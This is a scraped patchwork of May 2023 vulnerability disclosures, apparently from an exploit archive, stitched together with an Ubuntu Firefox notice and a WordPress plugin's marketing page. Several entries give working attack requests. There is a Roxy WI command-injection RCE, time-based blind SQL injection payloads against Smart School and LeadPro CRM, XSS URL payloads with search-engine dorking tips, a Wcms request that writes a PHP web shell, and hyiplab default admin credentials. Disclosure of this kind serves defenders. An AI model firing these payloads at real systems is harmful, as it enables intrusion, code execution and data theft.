FusionInvoice version 2023-1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting)# Date: 2023-05-24# Exploit Author: Andrea Intilangelo# Vendor Homepage: https://www.squarepiginteractive.com# Software Link: https://www.fusioninvoice.com/store# Version: 2023-1.0# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 113.0.1, Microsoft Edge 113.0.1774.50)# CVE: CVE-2023-25439Description:A stored cross-site scripting (XSS) vulnerability in FusionInvoice 2023-1.0 (from Sqware Pig, LLC) allows attacker toexecute arbitrary web scripts or HTML.Injecting persistent javascript code inside the title and/or description while creating a task/expense/project (andpossibly others) it will be triggered once page gets loaded.Steps to reproduce:- Click on "Expenses", or "Tasks" and add (or edit an existing) one,- Insert a payload PoC inside a field, in example in the "Phone number" (or "Description"),- Click on 'Save'.Visiting the website dashboard, as well as the customer or project summary page, the javascript code will be executed.Timeline:2023-01-29: Vulnerability discovered2023-01-29: Vendor contacted2023-02-01: No reply, vendor contacted for 2nd time2023-02-02: Request for CVE reservation2023-04-25: Assigned CVE number CVE-2023-254392023-04-27: No reply, vendor contacted for 3rd time2023-05-15: No reply, vendor contacted for last time2023-05-24: Public disclosurePoC Screenshots:https://imagebin.ca/v/7FOZfztkDs3I

FusionInvoice 2023-1.0 Cross Site Scripting

Ubuntu Security Notice 6074-3 - USN-6074-1 fixed vulnerabilities and USN-6074-2 fixed minor regressions in Firefox. The update introduced several minor regressions. This update fixes the problem. Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code. Irvan Kurniawan discovered that Firefox did not properly manage memory when using RLBox Expat driver. An attacker could potentially exploits this issue to cause a denial of service. Anne van Kesteren discovered that Firefox did not properly validate the import call in service workers. An attacker could potentially exploits this to obtain sensitive information. Sam Ezeh discovered that Firefox did not properly handle certain favicon image files. If a user were tricked into opening a malicious favicon file, an attacker could cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6074-3  
May 24, 2023

firefox regressions  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

USN-6074-2 caused some minor regressions in Firefox.

Software Description:  
- firefox: Mozilla Open Source web browser

Details:

USN-6074-1 fixed vulnerabilities and USN-6074-2 fixed minor regressions in  
Firefox. The update introduced several minor regressions. This update fixes  
the problem.

We apologize for the inconvenience.

Original advisory details:

 Multiple security issues were discovered in Firefox. If a user were  
 tricked into opening a specially crafted website, an attacker could  
 potentially exploit these to cause a denial of service, obtain sensitive  
 information across domains, or execute arbitrary code. (CVE-2023-32205,  
 CVE-2023-32207, CVE-2023-32210, CVE-2023-32211, CVE-2023-32212,  
 CVE-2023-32213, CVE-2023-32215, CVE-2023-32216)

  Irvan Kurniawan discovered that Firefox did not properly manage memory  
 when using RLBox Expat driver. An attacker could potentially exploits this  
 issue to cause a denial of service. (CVE-2023-32206)

  Anne van Kesteren discovered that Firefox did not properly validate the  
 import() call in service workers. An attacker could potentially exploits  
 this to obtain sensitive information. (CVE-2023-32208)

  Sam Ezeh discovered that Firefox did not properly handle certain favicon  
 image files. If a user were tricked into opening a malicicous favicon file,  
 an attacker could cause a denial of service. (CVE-2023-32209)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
  firefox                         113.0.2+build1-0ubuntu0.20.04.1

Ubuntu 18.04 LTS:  
  firefox                         113.0.2+build1-0ubuntu0.18.04.1

After a standard system update you need to restart Firefox to make all the  
necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6074-3  
  https://ubuntu.com/security/notices/USN-6074-1  
  https://launchpad.net/bugs/2020649

Package Information:  
  https://launchpad.net/ubuntu/+source/firefox/113.0.2+build1-0ubuntu0.20.04.1  
  https://launchpad.net/ubuntu/+source/firefox/113.0.2+build1-0ubuntu0.18.04.1

Ubuntu Security Notice USN-6074-3

Roxy WI version 6.1.0.0 remote command execution exploit. This is a variant of the original disclosure of remote command execution in this version by Nuri Cilengir in April of 2023.

    # Exploit Title: Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE) via subprocess_execute# Exploit Author: Iyaad Luqman K# Application: Roxy WI <= v6.1.0.0# Vendor Homepage: https://roxy-wi.org# Software Link: https://github.com/hap-wi/roxy-wi.git# Tested on: Ubuntu 22.04# CVE : CVE-2022-31137# PoCPOST /app/options.py HTTP/1.1Host: 192.168.1.44User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 136Origin: https://192.168.1.44Referer: https://192.168.1.44/app/login.pyConnection: closeshow_versions=1&token=&alert_consumer=1&serv=127.0.0.1&getcertalert_consumer=1&serv=127.0.0.1&ipbackend=";id+##&backend_server=127.0.0.1

Roxy WI 6.1.0.0 Remote Command Execution

Smart School version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Smart School v1.0 - SQL Injection# Date: 2023-05-17# Exploit Author: Ahmet Ümit BAYRAM# Vendor: https://codecanyon.net/item/smart-school-school-management-system/19426018# Demo Site: https://demo.smart-school.in# Tested on: Kali Linux# CVE: N/A### Request ###POST /course/filterRecords/ HTTP/1.1Host: localhostCookie: ci_session=dd1bqn8ulsiog4vf7fle5hd4k4fklvveUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101Firefox/102.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 136Origin: https://localhostReferer: https://localhost/course/Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: closesearchdata%5B0%5D%5Btitle%5D=category&searchdata%5B0%5D%5Bsearchfield%5D=online_courses.category_id&searchdata%5B0%5D%5Bsearchvalue%5D=1### Parameter & Payloads ###Parameter: searchdata[0][searchfield] (POST)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload:searchdata[0][title]=category&searchdata[0][searchfield]=online_courses.category_idAND (SELECT 7313 FROM (SELECT(SLEEP(5)))mvaR)--hAHp&searchdata[0][searchvalue]=1

Smart School 1.0 SQL Injection

LeadPro CRM version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: LeadPro CRM v1.0 - SQL Injection# Date: 2023-05-17# Exploit Author: Ahmet Ümit BAYRAM# Vendor: https://codecanyon.net/item/leadifly-lead-call-center-crm/43485578# Demo Site: https://demo.leadifly.in# Tested on: Kali Linux# CVE: N/A### Request ###GET /api/v1/products?fields=id,xid,name,price,product_type,tax_rate,tax_label,logo,logo_url&filters=name%20lk%20%22%25aa%25%22&order=id%20desc&offset=0&limit=10HTTP/1.1Host: localhostCookie:XSRF-TOKEN=eyJpdiI6Ind6QkVPeUZzKzI3SWlqSnhjQksyK1E9PSIsInZhbHVlIjoiNU1FQzBRR3NJaFFMNXVrOFp6Y3puQjdNT3ZKcSsyYzc0Nllkc1ovbkMzRnJueDZWV1lnZzJ2RmRaZFRobmRRSmUzVFpDS3dhNVhVRS84UXQrd1FrWkFIclR4Z0d3UDk2YjdFS0MxN25aVG5sY2loQjFYVkhrRXdOV2lWM0s4Um4iLCJtYWMiOiI2MjBiMTEwYTY5MWE3YjYyZTRjYmU5MWU0ZTcwZjRmNGI5ZjUxNjZjNjFmMjc1ZDAwOTE1ODM3NzA5YzZkMzQzIiwidGFnIjoiIn0%3D;leadifly_session=eyJpdiI6InYyUzVNWkVhVHVrODI2ZTl0a21SNmc9PSIsInZhbHVlIjoiSzNjeDVxYUJRbHZEOVd3Z2I3N2pWa1VrbHdTUUNNSmF6blFEN2E4Q3l5RjJ5WnUxbTdyaFJJN3dCUWhZRklzd3B2OWN5bkZJTnR0RndndGxyNjdRSUp6b2NBV1JhSHFWb211SllzajFkb3JCQmtqSzJEeU9ENDZDWW1jdnF0VHEiLCJtYWMiOiI1YjI1YTdlNjhkMDg4NTQyOGI0ODI0ODI5ZjliNzE0OWExNGUxMWVjYmY2MjM2Y2YyMmNkNjMzYmMzODYwNzE1IiwidGFnIjoiIn0%3DUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101Firefox/102.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestX-Csrf-Token: kMwvghrsJyPwJ1LGTXnMgMQAtQGA33DzzMYdes6VAuthorization: BearereyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL2RlbW8ubGVhZGlmbHkuaW4vYXBpL3YxL2F1dGgvbG9naW4iLCJpYXQiOjE2ODQzMTk3ODAsImV4cCI6MTY4NDM0MTY4MCwibmJmIjoxNjg0MzE5NzgwLCJqdGkiOiJleGJDV2ZmdWhiWTIzRlNqIiwic3ViIjoiMSIsInBydiI6IjIzYmQ1Yzg5NDlmNjAwYWRiMzllNzAxYzQwMDg3MmRiN2E1OTc2ZjcifQ.0GcDjE6Q3GYg8PUeJQAXtMET6yAjGh1Bj9joRMoqZo8X-Xsrf-Token:eyJpdiI6Ind6QkVPeUZzKzI3SWlqSnhjQksyK1E9PSIsInZhbHVlIjoiNU1FQzBRR3NJaFFMNXVrOFp6Y3puQjdNT3ZKcSsyYzc0Nllkc1ovbkMzRnJueDZWV1lnZzJ2RmRaZFRobmRRSmUzVFpDS3dhNVhVRS84UXQrd1FrWkFIclR4Z0d3UDk2YjdFS0MxN25aVG5sY2loQjFYVkhrRXdOV2lWM0s4Um4iLCJtYWMiOiI2MjBiMTEwYTY5MWE3YjYyZTRjYmU5MWU0ZTcwZjRmNGI5ZjUxNjZjNjFmMjc1ZDAwOTE1ODM3NzA5YzZkMzQzIiwidGFnIjoiIn0=Referer: https://localhost/admin/productSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: close### Parameter & Payloads ###Parameter: filters (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload:fields=id,xid,name,price,product_type,tax_rate,tax_label,logo,logo_url&filters=namelk "%aa%") AND (SELECT 6593 FROM (SELECT(SLEEP(5)))qBNH) AND(8549=8549&order=id desc&offset=0&limit=10

LeadPro CRM 1.0 SQL Injection

Esg version 2.5 suffers from a cross site scripting vulnerability.

**Esg 2.5 Cross Site Scripting**

Posted May 24, 2023

Authored by indoushka

Esg version 2.5 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | af04171eca15deed52f8552f83c674dd50fbac0bfc4810eb316c96bde1b17488

Download | Favorite | View

**Esg 2.5 Cross Site Scripting**

    ===========================================================================================| # Title     : Esg 2.5 XSS Vulnerability                                                 || # Author    : indoushka                                                                 || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)     | | # Vendor    : https://www.creatop.com.tw/esg                                            |  | # Dork      : Powered by CREATOP                                                        |===========================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /en/news/news.php?page=1&tayear=2023'"()%26%25<script>alert(/indoushka/);</script>[+] http://www.127.0.0.1/vitaltec.com.tw/en/news/news.php?page=1&tayear=2023'"()%26%25<script>alert(/indoushka/);</script>Greetings to :===================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet|=================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,187)
*   Arbitrary (16,018)
*   BBS (2,859)
*   Bypass (1,690)
*   CGI (1,024)
*   Code Execution (7,128)
*   Conference (677)
*   Cracker (841)
*   CSRF (3,315)
*   DoS (23,129)
*   Encryption (2,360)
*   Exploit (51,088)
*   File Inclusion (4,193)
*   File Upload (952)
*   Firewall (821)
*   Info Disclosure (2,712)
*   Intrusion Detection (883)
*   Java (2,998)
*   JavaScript (838)
*   Kernel (6,550)
*   Local (14,376)
*   Magazine (586)
*   Overflow (12,597)
*   Perl (1,421)
*   PHP (5,123)
*   Proof of Concept (2,302)
*   Protocol (3,559)
*   Python (1,499)
*   Remote (30,474)
*   Root (3,552)
*   Rootkit (505)
*   Ruby (607)
*   Scanner (1,633)
*   Security Tool (7,845)
*   Shell (3,159)
*   Shellcode (1,211)
*   Sniffer (892)
*   Spoof (2,189)
*   SQL Injection (16,219)
*   TCP (2,394)
*   Trojan (687)
*   UDP (883)
*   Virus (664)
*   Vulnerability (31,548)
*   Web (9,548)
*   Whitepaper (3,742)
*   x86 (958)
*   XSS (17,668)
*   Other

**File Archives**

*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,970)
*   BSD (372)
*   CentOS (57)
*   Cisco (1,920)
*   Debian (6,746)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,312)
*   HPUX (879)
*   iOS (342)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (45,712)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (482)
*   RedHat (13,293)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,597)
*   UNIX (9,230)
*   UnixWare (186)
*   Windows (6,554)
*   Other

Esg 2.5 Cross Site Scripting

The Go Pricing - WordPress Responsive Pricing Tables plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'process_postdata' function in versions up to, and including, 3.3.19. This makes it possible for authenticated attackers with a role that the administrator previously granted access to the plugin to modify access to the plugin when it should only be the administrator's privilege.

****Go Pricing** Current Version 3.3.19 – June 18, 2021****Create amazing WordPress Pricing & Compare Tables**

It’s super easy to create WordPress pricing or compare tables with Go Pricing. If you buy this product, you won’t need anything else.

These WordPress Pricing Tables support various Media Elements like Audio, Video, Image or Map. Just give it a try! We are sure you will never use any other table plugin.

For more information please scroll down!

  
**Key Features**

**Easy to Use Admin Interface** – Edit your tables quickly and swiftly with our clean UI. There are help texts, colours, icons to help you in the efficient navigation.

**Various Media Types** – Make your tables more unique and engaging by adding content types like: Audio, Video or Map.

**Google Fonts** – Take full use of the complete Google font set and find the best matching one to your site.

**2000+ Font Icons** – Font Awesome, Icomoon, Linecon & Material Icons give you scalable vector icons that can be instantly customized, and they will look gorgeous on high-resolution displays.

**Live Preview** – This function will enable you to see how your will look Pricing Table in real time.

**Bulk Actions** – You can perform various operations on the dashboard with multiple tables, like: cloning, exporting, deleting.

**Column Animations** – Give some vibe to your tables! Choose any of the 39 amazing transitions for each and every column according to your taste.

**Customisable Responsivity** – Thanks to the various configuration options you can make sure that your table provides the best possible experience on any device.

**Import & Export functions** – You can swiftly import demo tables, create or restore backups, and move your data between sites.

**Built-in Plugin Update** – You can keep your installed version up to date and utilise all the latest fixes, features and improvements.

**Small Footprint** – You can ensure that the content is only loaded when it is necessary.

**Classic and Modern in one? Yes.**  
If you like traditional _WordPress Pricing Tables_, but you would like to get much more, then you are at the right place. You will get all the usual pricing table features, and our plugin also supports Videos (Youtube, Vimeo, Screenr) and Images optional responsivity. Enjoy this _easy and quick_ way of creating stunning tables, and integrating them into your existing WordPress site was never easier thanks to our Admin Panel. You will surely find the one from our ready made, but customizable demo tables that fits the best for you.

**What else can I do with Go Pricing Tables? We have some ideas.  
**Beside traditional _Pricing Tables_ features the plugin is suitable for creating Team Viewer and Compare Tables. These features can also be found in the package.

**Is the system flexible? Yes.  
**The responsivity is optional. It can be turned On and Off and customizable to adapt to your site or CSS framework (e.g. Bootstrap). You can use System or any Google Web Fonts (650+).

**Can I use more than one table on my site? Yes.**  
You can use any number of tables on your site, or even on one single page using shortcodes.

**Style & Layout**

*   Column Animation  
    *   Column Transition
    *   Price Counter
*   Text based ribbon (CSS)  
*   Unlimited colors and color combination of columns
*   Unlimited and different number of rows in Body and Footer
*   Any number of columns up to 10
*   Configurable column space and border radius
*   Standard and circle Header Styles
*   Advanced row and column height Equalization System
*   Numerous column shadow and sign options
*   Unlimited buttons in Body and Footer
*   Unique tooltip style
*   Paypal and s2Member button shortcode support
*   650+ Google Web Font
*   1900+ Font icons  
    *   Font Awesome
    *   Icomoon
    *   Linecon
    *   Material Icons
*   250+ Starter Template
    *   90+ Classic Style
    *   150+ Clean Style

**Responsivity**

*   Optional and customizable responsivity per tables
*   Configurable Breakpoints and number of columns

*   Responsive Images
*   Audio
    *   SoundCloud
    *   Mixcloud
    *   Beatport
    *   HTML5 audio
*   Video
    *   YouTube
    *   Vimeo
    *   Screenr
    *   Dailymotion
    *   Metacafe
    *   HTML5 video
*   Google Map – Classic, Clean and custom pins
*   Custom iFrame

**Modern user-friendly Admin Interface**

*   Optionally Ajaxified Admin
*   Help System
*   Advanced Table Dashboard
    *   Searching and Sorting possibilities
    *   Cloning and Deleting bulk actions
*   Update Notification and built-in Update functionality  
*   Visual Table Editor – Sort, Delete and Clone columns and rows
*   Advanced data Export and Import
*   Built-in Live Preview with responsivity settings
*   Visual Composer compatibility

**Supports the Latest Web Technologies**

*   Supports all modern browsers on the market
    *   Chrome
    *   Firefox
    *   Safari
    *   Opera
    *   Internet Explorer (9+)
*   Touch support for mobile devices, including iOS, Android, and Windows

**Other**

*   Layered PSDs for signs and pins
*   Translation ready with .mo .po files

**Quality & Originality**

Our goal is the best quality, however issues may occur which we try to fix quickly. We continuously monitor customer feedbacks and suggestions. Always use the latest version of this product.

  
**Changelog**

**v3.3.19 – June 18, 2021**

*   \[FIX\] PHP 7.4 compatibility issues fix in frontend
*   \[FIX\] Minor backend CSS fixes

**v3.3.18 – December 28, 2020**

*   \[FIX\] WordPress 5.6 compatibility issues fix in backend and frontend
*   \[FIX\] Minor frontend JavaScript fixes

**v3.3.17 – March 05, 2020**

*   \[IMPROVEMENT\] New tooltip position possibilities and automatic alignment on mobiles
*   \[FIX\] Fix for tooltip “cut-off” issue on mobiles

**v3.3.16 – November 14, 2019**

*   \[FIX\] WordPress 5.3 compatibility issue fix

**v3.3.15 – July 8, 2019**

*   \[IMPROVEMENT\] Minor improvements in PHP code
*   \[IMPROVEMENT\] Cornerstone Page Builder integration

**v3.3.14 – Jan 21, 2019**

*   \[FIX\] PHP 7+ Compatibility issue fix
*   \[IMPROVEMENT\] Minor CSS improvement in the frontend CSS

**v3.3.13 – Aug 16, 2018**

*   \[IMPROVEMENT\] Improved API caching to prevent slow down of the admin page loading if API is unavailable

We are frequently releasing new features and bufixes to the plugin, so it is strongly recommended to keep it up do date, to make sure that you utilise all the latest fixes, features and improvements!

**View our Changelog details**

CVE-2023-2494: Go Pricing - WordPress Responsive Pricing Tables

Stored Cross Site Scripting (XSS) vulnerability in the add contact function CiviCRM 5.59.alpha1, allows attackers to execute arbitrary code in first/second name field.

    # Exploit Title: CiviCRM 5.59.alpha1 - Stored XSS (Cross-Site Scripting)# Date: 2023-02-02# Exploit Author: Andrea Intilangelo# Vendor Homepage: https://civicrm.org# Software Link: https://civicrm.org/download# Version: 5.59.alpha1, 5.58.0 (and earlier), 5.57.3 (and earlier)# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 109.0.1, Microsoft Edge 109.0.1518.70)# CVE: CVE-2023-25440 / Vendor Security Advisory: CIVI-SA-2023-05Description:A stored cross-site scripting (XSS) vulnerability in CiviCRM 5.59.alpha1 allows attacker to execute arbitrary webscripts or HTML.Injecting persistent javascript code inside the "Add Contact" function while creating a contact, in first/second namefield, it will be triggered once page gets loaded.Steps to reproduce:- Quick Add contact to CiviCRM,- Insert a payload PoC inside the field(s)- Click on 'Add contact'.If a user visits the dashboard, as well as "Recently added" box, the javascript code will be rendered.Timeline:2023-01-29: Vulnerability discovered2023-02-02: Request for CVE reservation2023-02-04: Vendor contacted2023-02-06: Vendor replies, acknowledgments and coordinating for advisory2023-02-14: Vendor discloses Security advisory and credits, internal id: CIVI-SA-2023-052023-02-15: Vendor Security Advisory publication on https://civicrm.org/advisory/civi-sa-2023-05-quick-add-widget2023-04-27: Assigned CVE number: CVE-2023-254402023-05-18: CVE publication / disclosure

CVE-2023-25440: CiviCRM 5.59.alpha1 Cross Site Scripting ≈ Packet Storm

In Wcms 0.3.2, an attacker can send a crafted request from a vulnerable web application backend server /wcms/wex/html.php via the finish parameter and the textAreaCode parameter. It can write arbitrary strings into custom file names and upload any files, and write malicious code to execute scripts to trigger command execution.

Hi, dev team! The code in this file is vulnerable: Arbitrary file write And execute the command through this file

**Vulnerability discovery**

Vulnerable code found on lines 20 to 23 in the /wcms/wex/html.php file

if (isset($\_GET\['finish'\])) {
    $path = $\_GET\['finish'\];
    file\_put\_contents($path, $\_POST\['textAreaCode'\]);

Since the finish variable of the GET request and the textAreaCode variable of the POST request are controllable, an attacker can use the file\_put\_contents function to write malicious code into a custom file

**construct poc**

Use controllable variables to write malicious code into the shell.php file in the current directory  
The payload is as follows：

    POST /wangmarket-master/wcms-0.3.2/wcms/wex/html.php?finish=shell.php HTTP/1.1
    Host: 192.168.3.10
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Cookie: PHPSESSID=pdvblj8k9q6rin0oroe36m6s77
    Upgrade-Insecure-Requests: 1
    Content-Length: 36
    
    textAreaCode=<?php system('whoami');?>
    

  
It can be seen that the write is successful  

**get shell**

Access the written malicious file, find that the malicious code is successfully executed, and echo it out

CVE-2023-31689: Arbitrary file write vulnerability in /wcms/wex/html.php · Issue #15 · vedees/wcms

hyiplab version 2.1 leaves a default set of administrative credentials installed post installation.

    ====================================================================================================================================| # Title     : hyiplab V2.1 Insecure Settings Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(64-bit)                                              | | # Vendor    : https://appdevs.net/                                                                                               |  | # Dork      : "Every balance subtracting transactions need OTP verification so You can feel safe about your funds."              |====================================================================================================================================poc :[+] The vulnerability is about leaving the default settings    During the installation of the script and using the default username and password  [+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user=admin  & pass= admin[+] https://127.0.0.1/hyiplab/admin/dashboardGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Tag

#firefox